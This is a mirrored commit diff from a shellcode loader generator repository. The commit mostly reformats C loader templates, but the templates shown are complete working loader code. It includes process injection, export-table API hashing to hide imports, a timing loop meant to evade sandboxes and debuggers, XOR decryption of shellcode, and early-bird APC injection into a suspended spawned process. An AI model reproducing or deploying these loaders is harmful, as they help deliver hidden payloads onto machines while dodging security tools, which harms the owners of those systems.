mirror of
https://github.com/gatariee/ldrgen
synced 2026-06-06 15:44:29 +00:00
XD
This commit is contained in:
@@ -17,7 +17,7 @@ Externally defined shellcode variables:
|
||||
#define MAX_PROCESSES 1024
|
||||
#define PROCESS_NAME_MAX_LENGTH MAX_PATH
|
||||
|
||||
DWORD findPID( const char *token ) {
|
||||
DWORD findPID( const char * token ) {
|
||||
DWORD aProcesses[1024], cbNeeded, cProcesses;
|
||||
unsigned int i;
|
||||
if ( !EnumProcesses( aProcesses, sizeof( aProcesses ), &cbNeeded ) ) {
|
||||
@@ -47,7 +47,7 @@ DWORD findPID( const char *token ) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
BOOL Inject( DWORD pid, const char *target, size_t shellcodeSize, const unsigned char *shellcode ) {
|
||||
BOOL Inject( DWORD pid, const char * target, size_t shellcodeSize, const unsigned char * shellcode ) {
|
||||
HANDLE procHandle = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pid );
|
||||
if ( procHandle == NULL ) {
|
||||
printf( "[-] Could not open process handle\n" );
|
||||
@@ -91,8 +91,8 @@ BOOL Inject( DWORD pid, const char *target, size_t shellcodeSize, const unsigned
|
||||
[!] Remember to remove the print strings when you are done debugging
|
||||
*/
|
||||
|
||||
int main( int argc, char *argv[] ) {
|
||||
const char *target = "notepad.exe";
|
||||
int main( int argc, char * argv[] ) {
|
||||
const char * target = "notepad.exe";
|
||||
|
||||
DWORD pid = findPID( target );
|
||||
if ( pid == 0 ) {
|
||||
|
||||
@@ -17,7 +17,7 @@ Externally defined shellcode variables:
|
||||
#define MAX_PROCESSES 1024
|
||||
#define PROCESS_NAME_MAX_LENGTH MAX_PATH
|
||||
|
||||
DWORD findPID( const char *token ) {
|
||||
DWORD findPID( const char * token ) {
|
||||
DWORD aProcesses[1024], cbNeeded, cProcesses;
|
||||
unsigned int i;
|
||||
if ( !EnumProcesses( aProcesses, sizeof( aProcesses ), &cbNeeded ) ) {
|
||||
@@ -47,7 +47,7 @@ DWORD findPID( const char *token ) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
BOOL Inject( DWORD pid, const char *target, size_t shellcodeSize, const unsigned char *shellcode ) {
|
||||
BOOL Inject( DWORD pid, const char * target, size_t shellcodeSize, const unsigned char * shellcode ) {
|
||||
HANDLE procHandle = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pid );
|
||||
if ( procHandle == NULL ) {
|
||||
printf( "[-] Could not open process handle\n" );
|
||||
@@ -100,8 +100,8 @@ BOOL Inject( DWORD pid, const char *target, size_t shellcodeSize, const unsigned
|
||||
[!] Remember to remove the print strings when you are done debugging
|
||||
*/
|
||||
|
||||
int main( int argc, char *argv[] ) {
|
||||
const char *target = "notepad.exe";
|
||||
int main( int argc, char * argv[] ) {
|
||||
const char * target = "notepad.exe";
|
||||
|
||||
DWORD pid = findPID( target );
|
||||
if ( pid == 0 ) {
|
||||
|
||||
@@ -11,7 +11,7 @@ Externally defined shellcode variables:
|
||||
|
||||
#include <windows.h>
|
||||
|
||||
int main( int argc, char *argv[] ) {
|
||||
int main( int argc, char * argv[] ) {
|
||||
|
||||
LPVOID mem = VirtualAlloc( NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
|
||||
if ( mem == NULL ) {
|
||||
|
||||
@@ -23,7 +23,7 @@ Externally defined IAT variables:
|
||||
#include <stdio.h>
|
||||
#include <windows.h>
|
||||
|
||||
int main( int argc, char *argv[] ) {
|
||||
int main( int argc, char * argv[] ) {
|
||||
|
||||
HMODULE hLib = LoadLibraryA( "kernel32.dll" );
|
||||
if ( hLib == NULL ) {
|
||||
|
||||
@@ -31,7 +31,7 @@ Externally defined IAT variables:
|
||||
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
int main( int argc, char *argv[] ) {
|
||||
int main( int argc, char * argv[] ) {
|
||||
|
||||
HMODULE hLib = LoadLibraryA( "kernel32.dll" );
|
||||
if ( hLib == NULL ) {
|
||||
|
||||
@@ -32,7 +32,7 @@ Externally defined IAT variables:
|
||||
#include <stdio.h>
|
||||
#include <windows.h>
|
||||
|
||||
int main( int argc, char *argv[] ) {
|
||||
int main( int argc, char * argv[] ) {
|
||||
|
||||
/*
|
||||
|
||||
@@ -62,7 +62,7 @@ int main( int argc, char *argv[] ) {
|
||||
( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
|
||||
|
||||
BOOL( *WriteProcessMemory )
|
||||
( HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten );
|
||||
( HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten );
|
||||
|
||||
DWORD( *QueueUserAPC )
|
||||
( PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData );
|
||||
@@ -149,9 +149,9 @@ int main( int argc, char *argv[] ) {
|
||||
printf( "[+] Successfully resolved %zu hashes\n", sizeof( hashes ) / sizeof( hashes[0] ) );
|
||||
printf( "[!!!] Beginning loader routine now. \n\n" );
|
||||
|
||||
STARTUPINFO si = { sizeof( si ) };
|
||||
STARTUPINFO si = { sizeof( si ) };
|
||||
PROCESS_INFORMATION pi = { 0 };
|
||||
LPCSTR target = "C:\\Windows\\System32\\cmd.exe";
|
||||
LPCSTR target = "C:\\Windows\\System32\\cmd.exe";
|
||||
|
||||
printf( "[-] Tasked to spawn: %s\n", target );
|
||||
|
||||
|
||||
@@ -20,7 +20,7 @@ Externally defined xorShellcode function:
|
||||
*/
|
||||
|
||||
#include <windows.h>
|
||||
int main( int argc, char *argv[] ) {
|
||||
int main( int argc, char * argv[] ) {
|
||||
|
||||
/* Allocate memory for shellcode */
|
||||
LPVOID mem = VirtualAlloc( NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
|
||||
|
||||
@@ -20,7 +20,7 @@ Externally defined xorShellcode function:
|
||||
*/
|
||||
|
||||
#include <windows.h>
|
||||
int main( int argc, char *argv[] ) {
|
||||
int main( int argc, char * argv[] ) {
|
||||
|
||||
/* Allocate memory for shellcode */
|
||||
LPVOID mem = VirtualAlloc( NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
|
||||
|
||||
@@ -10,12 +10,12 @@ Externally defined shellcode variables:
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <windows.h>
|
||||
#include <windows.h>
|
||||
|
||||
int main( int argc, char *argv[] ) {
|
||||
STARTUPINFO si = { sizeof( si ) };
|
||||
int main( int argc, char * argv[] ) {
|
||||
STARTUPINFO si = { sizeof( si ) };
|
||||
PROCESS_INFORMATION pi = { 0 };
|
||||
LPCSTR target = "${ PNAME }";
|
||||
LPCSTR target = "${ PNAME }";
|
||||
|
||||
printf( "[+] Tasked to spawn: %s\n", target );
|
||||
|
||||
|
||||
@@ -3,8 +3,8 @@
|
||||
Externally defined shellcode variables:
|
||||
|
||||
{
|
||||
unsigned char shellcode[];
|
||||
unsigned int shellcode_size;
|
||||
unsigned char shellcode[];
|
||||
unsigned int shellcode_size;
|
||||
}
|
||||
|
||||
*/
|
||||
@@ -14,7 +14,7 @@ Externally defined shellcode variables:
|
||||
Externally defined xorShellcode function:
|
||||
|
||||
{
|
||||
void xorShellcode(unsigned char *shellcode, unsigned int shellcode_size, unsigned char key);
|
||||
void xorShellcode(unsigned char *shellcode, unsigned int shellcode_size, unsigned char key);
|
||||
}
|
||||
|
||||
*/
|
||||
@@ -24,7 +24,7 @@ Externally defined xorShellcode function:
|
||||
Externally defined IAT variables:
|
||||
|
||||
{
|
||||
FARPROC AddrFromHash( HMODULE hLib, uint64_t hashval, uint64_t seed );
|
||||
FARPROC AddrFromHash( HMODULE hLib, uint64_t hashval, uint64_t seed );
|
||||
}
|
||||
|
||||
*/
|
||||
@@ -34,240 +34,242 @@ Externally defined IAT variables:
|
||||
Externally defined Hash function:
|
||||
|
||||
{
|
||||
uint64_t Hash( const char *str, uint64_t seed );
|
||||
uint64_t Hash( const char *str, uint64_t seed );
|
||||
}
|
||||
|
||||
*/
|
||||
|
||||
|
||||
#include <stdint.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <time.h>
|
||||
#include <windows.h>
|
||||
|
||||
int main( int argc, char* argv[] ) {
|
||||
int main( int argc, char * argv[] ) {
|
||||
|
||||
typedef struct {
|
||||
BOOL( *CreateProcessA )
|
||||
(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles,
|
||||
DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
|
||||
typedef struct {
|
||||
BOOL( *CreateProcessA )
|
||||
( LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles,
|
||||
DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation );
|
||||
|
||||
LPVOID( *VirtualAllocEx )
|
||||
(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
|
||||
LPVOID( *VirtualAllocEx )
|
||||
( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
|
||||
|
||||
BOOL( *WriteProcessMemory )
|
||||
(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T* lpNumberOfBytesWritten);
|
||||
BOOL( *WriteProcessMemory )
|
||||
( HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten );
|
||||
|
||||
DWORD( *QueueUserAPC )
|
||||
(PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData);
|
||||
DWORD( *QueueUserAPC )
|
||||
( PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData );
|
||||
|
||||
DWORD( *ResumeThread )
|
||||
(HANDLE hThread);
|
||||
DWORD( *ResumeThread )
|
||||
( HANDLE hThread );
|
||||
|
||||
DWORD( *WaitForSingleObject )
|
||||
(HANDLE hHandle, DWORD dwMilliseconds);
|
||||
DWORD( *WaitForSingleObject )
|
||||
( HANDLE hHandle, DWORD dwMilliseconds );
|
||||
|
||||
BOOL( *CloseHandle )
|
||||
(HANDLE hObject);
|
||||
BOOL( *CloseHandle )
|
||||
( HANDLE hObject );
|
||||
|
||||
BOOL( *VirtualFreeEx )
|
||||
(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
|
||||
BOOL( *VirtualFreeEx )
|
||||
( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType );
|
||||
|
||||
} Overwat;
|
||||
} Overwat;
|
||||
|
||||
/*
|
||||
CreateProcessA -> 0x215613a9e
|
||||
VirtualAllocEx -> 0x44fc51c32
|
||||
WriteProcessMemory -> 0x593b94aae
|
||||
QueueUserAPC -> 0x45688564c
|
||||
ResumeThread -> 0x24b52292
|
||||
WaitForSingleObject -> 0xd8670435
|
||||
CloseHandle -> 0x2fba412b3
|
||||
VirtualFreeEx -> 0x48238ac7f
|
||||
zzazzl -> 0x40ba6a2ed
|
||||
*/
|
||||
/*
|
||||
CreateProcessA -> 0x215613a9e
|
||||
VirtualAllocEx -> 0x44fc51c32
|
||||
WriteProcessMemory -> 0x593b94aae
|
||||
QueueUserAPC -> 0x45688564c
|
||||
ResumeThread -> 0x24b52292
|
||||
WaitForSingleObject -> 0xd8670435
|
||||
CloseHandle -> 0x2fba412b3
|
||||
VirtualFreeEx -> 0x48238ac7f
|
||||
zzazzl -> 0x40ba6a2ed
|
||||
*/
|
||||
|
||||
/* Sandbox Evasion */
|
||||
printf( "[*] Beginning sandbox evasion routine ...\n" );
|
||||
/* Sandbox Evasion */
|
||||
printf( "[*] Beginning sandbox evasion routine ...\n" );
|
||||
|
||||
const unsigned long long count_to = 10000000000;
|
||||
const int bw = 50;
|
||||
clock_t start, end;
|
||||
double cpu_time_used;
|
||||
const unsigned long long count_to = 10000000000;
|
||||
const int bw = 50;
|
||||
clock_t start, end;
|
||||
double cpu_time_used;
|
||||
|
||||
start = clock();
|
||||
start = clock();
|
||||
|
||||
for (unsigned long long i = 0; i < count_to; i++) {
|
||||
if (i % 100000000 == 0) {
|
||||
end = clock();
|
||||
cpu_time_used = ((double)(end - start)) / CLOCKS_PER_SEC;
|
||||
for ( unsigned long long i = 0; i < count_to; i++ ) {
|
||||
if ( i % 100000000 == 0 ) {
|
||||
end = clock();
|
||||
cpu_time_used = ( (double)( end - start ) ) / CLOCKS_PER_SEC;
|
||||
|
||||
double progress = (double)i / count_to;
|
||||
int pos = bw * progress;
|
||||
double progress = (double)i / count_to;
|
||||
int pos = bw * progress;
|
||||
|
||||
printf( "[" );
|
||||
for (int j = 0; j < bw; ++j) {
|
||||
if (j < pos) printf( "=" );
|
||||
else if (j == pos) printf( ">" );
|
||||
else printf( " " );
|
||||
}
|
||||
printf( "] %llu/%llu (%.2f%% complete, %f seconds elapsed)\n", i, count_to, progress * 100, cpu_time_used );
|
||||
}
|
||||
}
|
||||
printf( "[" );
|
||||
for ( int j = 0; j < bw; ++j ) {
|
||||
if ( j < pos )
|
||||
printf( "=" );
|
||||
else if ( j == pos )
|
||||
printf( ">" );
|
||||
else
|
||||
printf( " " );
|
||||
}
|
||||
printf( "] %llu/%llu (%.2f%% complete, %f seconds elapsed)\n", i, count_to, progress * 100, cpu_time_used );
|
||||
}
|
||||
}
|
||||
|
||||
end = clock();
|
||||
cpu_time_used = ((double)(end - start)) / CLOCKS_PER_SEC;
|
||||
printf( "Total time taken: %f seconds\n", cpu_time_used );
|
||||
end = clock();
|
||||
cpu_time_used = ( (double)( end - start ) ) / CLOCKS_PER_SEC;
|
||||
printf( "Total time taken: %f seconds\n", cpu_time_used );
|
||||
|
||||
if (cpu_time_used < 2) {
|
||||
printf( "[-] This is probably a sandbox, or someone attached a debugger and stepped over the loop\n" );
|
||||
return 1;
|
||||
}
|
||||
if ( cpu_time_used < 2 ) {
|
||||
printf( "[-] This is probably a sandbox, or someone attached a debugger and stepped over the loop\n" );
|
||||
return 1;
|
||||
}
|
||||
|
||||
printf( "[*] Sandbox evasion routine complete\n" );
|
||||
printf( "[*] Sandbox evasion routine complete\n" );
|
||||
|
||||
/* Resolving WinAPI Functions */
|
||||
/* Resolving WinAPI Functions */
|
||||
|
||||
printf( "[*] Resolving WinAPI functions ...\n" );
|
||||
printf( "[*] Resolving WinAPI functions ...\n" );
|
||||
|
||||
HMODULE hLib = LoadLibraryA( "kernel32.dll" );
|
||||
if (hLib == NULL) {
|
||||
printf( "Failed to load kernel32.dll\n" );
|
||||
return 1;
|
||||
}
|
||||
HMODULE hLib = LoadLibraryA( "kernel32.dll" );
|
||||
if ( hLib == NULL ) {
|
||||
printf( "Failed to load kernel32.dll\n" );
|
||||
return 1;
|
||||
}
|
||||
|
||||
uint64_t hashes[] = {
|
||||
0x215613a9e, 0x44fc51c32, 0x593b94aae, 0x45688564c, 0x24b52292, 0xd8670435, 0x2fba412b3, 0x48238ac7f };
|
||||
uint64_t hashes[] = {
|
||||
0x215613a9e, 0x44fc51c32, 0x593b94aae, 0x45688564c, 0x24b52292, 0xd8670435, 0x2fba412b3, 0x48238ac7f };
|
||||
|
||||
uint64_t seed = 5;
|
||||
uint64_t seed = 5;
|
||||
|
||||
Overwat w;
|
||||
Overwat w;
|
||||
|
||||
w.CreateProcessA = (BOOL( * )(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION))AddrFromHash( hLib, hashes[0], seed );
|
||||
w.CreateProcessA = (BOOL( * )( LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION ))AddrFromHash( hLib, hashes[0], seed );
|
||||
|
||||
if (w.CreateProcessA == NULL) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[0] );
|
||||
return 1;
|
||||
}
|
||||
if ( w.CreateProcessA == NULL ) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[0] );
|
||||
return 1;
|
||||
}
|
||||
|
||||
w.VirtualAllocEx = (LPVOID( * )(HANDLE, LPVOID, SIZE_T, DWORD, DWORD))AddrFromHash( hLib, hashes[1], seed );
|
||||
w.VirtualAllocEx = (LPVOID( * )( HANDLE, LPVOID, SIZE_T, DWORD, DWORD ))AddrFromHash( hLib, hashes[1], seed );
|
||||
|
||||
if (w.VirtualAllocEx == NULL) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[1] );
|
||||
return 1;
|
||||
}
|
||||
if ( w.VirtualAllocEx == NULL ) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[1] );
|
||||
return 1;
|
||||
}
|
||||
|
||||
w.WriteProcessMemory = (BOOL( * )(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T*))AddrFromHash( hLib, hashes[2], seed );
|
||||
w.WriteProcessMemory = (BOOL( * )( HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T * ))AddrFromHash( hLib, hashes[2], seed );
|
||||
|
||||
if (w.WriteProcessMemory == NULL) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[2] );
|
||||
return 1;
|
||||
}
|
||||
if ( w.WriteProcessMemory == NULL ) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[2] );
|
||||
return 1;
|
||||
}
|
||||
|
||||
w.QueueUserAPC = (DWORD( * )(PAPCFUNC, HANDLE, ULONG_PTR))AddrFromHash( hLib, hashes[3], seed );
|
||||
w.QueueUserAPC = (DWORD( * )( PAPCFUNC, HANDLE, ULONG_PTR ))AddrFromHash( hLib, hashes[3], seed );
|
||||
|
||||
if (w.QueueUserAPC == NULL) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[3] );
|
||||
return 1;
|
||||
}
|
||||
if ( w.QueueUserAPC == NULL ) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[3] );
|
||||
return 1;
|
||||
}
|
||||
|
||||
w.ResumeThread = (DWORD( * )(HANDLE))AddrFromHash( hLib, hashes[4], seed );
|
||||
w.ResumeThread = (DWORD( * )( HANDLE ))AddrFromHash( hLib, hashes[4], seed );
|
||||
|
||||
if (w.ResumeThread == NULL) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[4] );
|
||||
return 1;
|
||||
}
|
||||
if ( w.ResumeThread == NULL ) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[4] );
|
||||
return 1;
|
||||
}
|
||||
|
||||
w.WaitForSingleObject = (DWORD( * )(HANDLE, DWORD))AddrFromHash( hLib, hashes[5], seed );
|
||||
w.WaitForSingleObject = (DWORD( * )( HANDLE, DWORD ))AddrFromHash( hLib, hashes[5], seed );
|
||||
|
||||
if (w.WaitForSingleObject == NULL) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[5] );
|
||||
return 1;
|
||||
}
|
||||
if ( w.WaitForSingleObject == NULL ) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[5] );
|
||||
return 1;
|
||||
}
|
||||
|
||||
w.CloseHandle = (BOOL( * )(HANDLE))AddrFromHash( hLib, hashes[6], seed );
|
||||
w.CloseHandle = (BOOL( * )( HANDLE ))AddrFromHash( hLib, hashes[6], seed );
|
||||
|
||||
if (w.CloseHandle == NULL) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[6] );
|
||||
return 1;
|
||||
}
|
||||
if ( w.CloseHandle == NULL ) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[6] );
|
||||
return 1;
|
||||
}
|
||||
|
||||
w.VirtualFreeEx = (BOOL( * )(HANDLE, LPVOID, SIZE_T, DWORD))AddrFromHash( hLib, hashes[7], seed );
|
||||
w.VirtualFreeEx = (BOOL( * )( HANDLE, LPVOID, SIZE_T, DWORD ))AddrFromHash( hLib, hashes[7], seed );
|
||||
|
||||
if (w.VirtualFreeEx == NULL) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[7] );
|
||||
return 1;
|
||||
}
|
||||
if ( w.VirtualFreeEx == NULL ) {
|
||||
printf( "Failed to resolve hash: %llx\n", hashes[7] );
|
||||
return 1;
|
||||
}
|
||||
|
||||
FreeLibrary( hLib );
|
||||
FreeLibrary( hLib );
|
||||
|
||||
printf( "[+] Successfully resolved %zu hashes\n", sizeof( hashes ) / sizeof( hashes[0] ) );
|
||||
printf( "[+] Successfully resolved %zu hashes\n", sizeof( hashes ) / sizeof( hashes[0] ) );
|
||||
|
||||
/* Begin execution now. */
|
||||
/* Begin execution now. */
|
||||
|
||||
printf( "[!!!] Beginning loader routine now. \n\n" );
|
||||
printf( "[!!!] Beginning loader routine now. \n\n" );
|
||||
|
||||
STARTUPINFO si = { sizeof( si ) };
|
||||
PROCESS_INFORMATION pi = { 0 };
|
||||
LPCSTR target = "${ PNAME }";
|
||||
STARTUPINFO si = { sizeof( si ) };
|
||||
PROCESS_INFORMATION pi = { 0 };
|
||||
LPCSTR target = "${ PNAME }";
|
||||
|
||||
printf( "[-] Tasked to spawn: %s\n", target );
|
||||
printf( "[-] Tasked to spawn: %s\n", target );
|
||||
|
||||
if (!w.CreateProcessA( target, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi )) {
|
||||
printf( "[-] Task 1: failed with error code %d. Unable to create the process.\n", GetLastError() );
|
||||
return 1;
|
||||
}
|
||||
printf( "[+] OK: PID %d\n", pi.dwProcessId );
|
||||
if ( !w.CreateProcessA( target, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) ) {
|
||||
printf( "[-] Task 1: failed with error code %d. Unable to create the process.\n", GetLastError() );
|
||||
return 1;
|
||||
}
|
||||
printf( "[+] OK: PID %d\n", pi.dwProcessId );
|
||||
|
||||
printf( "[-] Tasked to allocate memory to PID: %d\n", pi.dwProcessId );
|
||||
LPVOID lpBaseAddress = w.VirtualAllocEx( pi.hProcess, NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
|
||||
if (lpBaseAddress == NULL) {
|
||||
printf( "[-] Task 2: failed with error code %d. Unable to allocate memory in the target process.\n", GetLastError() );
|
||||
w.CloseHandle( pi.hProcess );
|
||||
w.CloseHandle( pi.hThread );
|
||||
return 1;
|
||||
}
|
||||
printf( "[-] Tasked to allocate memory to PID: %d\n", pi.dwProcessId );
|
||||
LPVOID lpBaseAddress = w.VirtualAllocEx( pi.hProcess, NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
|
||||
if ( lpBaseAddress == NULL ) {
|
||||
printf( "[-] Task 2: failed with error code %d. Unable to allocate memory in the target process.\n", GetLastError() );
|
||||
w.CloseHandle( pi.hProcess );
|
||||
w.CloseHandle( pi.hThread );
|
||||
return 1;
|
||||
}
|
||||
|
||||
printf( "[+] OK: Address %p\n", lpBaseAddress );
|
||||
printf( "[+] OK: Address %p\n", lpBaseAddress );
|
||||
|
||||
printf( "[-] Beginning decryption routine. \n" );
|
||||
printf( "[-] Beginning decryption routine. \n" );
|
||||
|
||||
xorShellcode( shellcode, shellcode_size, "${ KEY }" );
|
||||
xorShellcode( shellcode, shellcode_size, "${ KEY }" );
|
||||
|
||||
printf( "[+] Shellcode decryption complete.\n" );
|
||||
printf( "[+] Shellcode decryption complete.\n" );
|
||||
|
||||
printf( "[-] Tasked to write shellcode to allocated memory in the target process...\n" );
|
||||
if (!w.WriteProcessMemory( pi.hProcess, lpBaseAddress, shellcode, shellcode_size, NULL )) {
|
||||
printf( "[-] Task 3: failed with error code %d. Unable to write to the allocated memory.\n", GetLastError() );
|
||||
w.VirtualFreeEx( pi.hProcess, lpBaseAddress, 0, MEM_RELEASE );
|
||||
w.CloseHandle( pi.hProcess );
|
||||
w.CloseHandle( pi.hThread );
|
||||
return 1;
|
||||
}
|
||||
printf( "[+] OK: Wrote %zu bytes to %p.\n", shellcode_size, lpBaseAddress );
|
||||
printf( "[-] Tasked to write shellcode to allocated memory in the target process...\n" );
|
||||
if ( !w.WriteProcessMemory( pi.hProcess, lpBaseAddress, shellcode, shellcode_size, NULL ) ) {
|
||||
printf( "[-] Task 3: failed with error code %d. Unable to write to the allocated memory.\n", GetLastError() );
|
||||
w.VirtualFreeEx( pi.hProcess, lpBaseAddress, 0, MEM_RELEASE );
|
||||
w.CloseHandle( pi.hProcess );
|
||||
w.CloseHandle( pi.hThread );
|
||||
return 1;
|
||||
}
|
||||
printf( "[+] OK: Wrote %zu bytes to %p.\n", shellcode_size, lpBaseAddress );
|
||||
|
||||
printf( "[+] Queuing APC to the target thread...\n" );
|
||||
if (!w.QueueUserAPC( (PAPCFUNC)lpBaseAddress, pi.hThread, NULL )) {
|
||||
printf( "[-] Task 4: failed with error code %d. Unable to queue the APC.\n", GetLastError() );
|
||||
w.VirtualFreeEx( pi.hProcess, lpBaseAddress, 0, MEM_RELEASE );
|
||||
w.CloseHandle( pi.hProcess );
|
||||
w.CloseHandle( pi.hThread );
|
||||
return 1;
|
||||
}
|
||||
printf( "[+] Successfully queued an APC to address %p.\n", lpBaseAddress );
|
||||
printf( "[+] Queuing APC to the target thread...\n" );
|
||||
if ( !w.QueueUserAPC( (PAPCFUNC)lpBaseAddress, pi.hThread, NULL ) ) {
|
||||
printf( "[-] Task 4: failed with error code %d. Unable to queue the APC.\n", GetLastError() );
|
||||
w.VirtualFreeEx( pi.hProcess, lpBaseAddress, 0, MEM_RELEASE );
|
||||
w.CloseHandle( pi.hProcess );
|
||||
w.CloseHandle( pi.hThread );
|
||||
return 1;
|
||||
}
|
||||
printf( "[+] Successfully queued an APC to address %p.\n", lpBaseAddress );
|
||||
|
||||
printf( "[+] Resuming the suspended thread (Thread ID: %d) in the target process...\n", pi.dwThreadId );
|
||||
w.ResumeThread( pi.hThread );
|
||||
printf( "[+] Thread resumed.\n" );
|
||||
printf( "[+] Resuming the suspended thread (Thread ID: %d) in the target process...\n", pi.dwThreadId );
|
||||
w.ResumeThread( pi.hThread );
|
||||
printf( "[+] Thread resumed.\n" );
|
||||
|
||||
printf( "[+] Waiting for the target process to exit...\n" );
|
||||
w.WaitForSingleObject( pi.hProcess, INFINITE );
|
||||
printf( "[+] Process with PID %d exited.\n", pi.dwProcessId );
|
||||
printf( "[+] Waiting for the target process to exit...\n" );
|
||||
w.WaitForSingleObject( pi.hProcess, INFINITE );
|
||||
printf( "[+] Process with PID %d exited.\n", pi.dwProcessId );
|
||||
|
||||
w.CloseHandle( pi.hProcess );
|
||||
w.CloseHandle( pi.hThread );
|
||||
w.CloseHandle( pi.hProcess );
|
||||
w.CloseHandle( pi.hThread );
|
||||
|
||||
printf( "[+] Process and thread handles closed. Exiting...\n" );
|
||||
return 0;
|
||||
printf( "[+] Process and thread handles closed. Exiting...\n" );
|
||||
return 0;
|
||||
}
|
||||
@@ -2,10 +2,10 @@
|
||||
#include <stdio.h>
|
||||
#include <windows.h>
|
||||
|
||||
uint64_t Hash( const char *str, uint64_t seed ) {
|
||||
const uint64_t p = 31;
|
||||
uint64_t Hash( const char * str, uint64_t seed ) {
|
||||
const uint64_t p = 31;
|
||||
const uint64_t lp = 1000000007;
|
||||
uint64_t ret = seed % lp;
|
||||
uint64_t ret = seed % lp;
|
||||
|
||||
while ( *str ) {
|
||||
ret = ( ( ret << 2 ) ^ ( (uint64_t)( *str ) << 1 ) ) % lp;
|
||||
|
||||
+10
-10
@@ -22,21 +22,21 @@ FARPROC AddrFromHash( HMODULE hLib, uint64_t hashval, uint64_t seed ) {
|
||||
|
||||
fprintf( stdout, "[-] Tasked to resolve hash: 0x%llx\n", hashval );
|
||||
|
||||
FARPROC ret = NULL;
|
||||
IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)hLib;
|
||||
IMAGE_NT_HEADERS *ntHeader = (IMAGE_NT_HEADERS *)( (uint64_t)hLib + dosHeader->e_lfanew );
|
||||
IMAGE_EXPORT_DIRECTORY *exportDir = (IMAGE_EXPORT_DIRECTORY *)( (uint64_t)hLib + ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress );
|
||||
uint32_t *nameTable = (uint32_t *)( (uint64_t)hLib + exportDir->AddressOfNames );
|
||||
uint16_t *ordinalTable = (uint16_t *)( (uint64_t)hLib + exportDir->AddressOfNameOrdinals );
|
||||
uint32_t *functionTable = (uint32_t *)( (uint64_t)hLib + exportDir->AddressOfFunctions );
|
||||
FARPROC ret = NULL;
|
||||
IMAGE_DOS_HEADER * dosHeader = (IMAGE_DOS_HEADER *)hLib;
|
||||
IMAGE_NT_HEADERS * ntHeader = (IMAGE_NT_HEADERS *)( (uint64_t)hLib + dosHeader->e_lfanew );
|
||||
IMAGE_EXPORT_DIRECTORY * exportDir = (IMAGE_EXPORT_DIRECTORY *)( (uint64_t)hLib + ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress );
|
||||
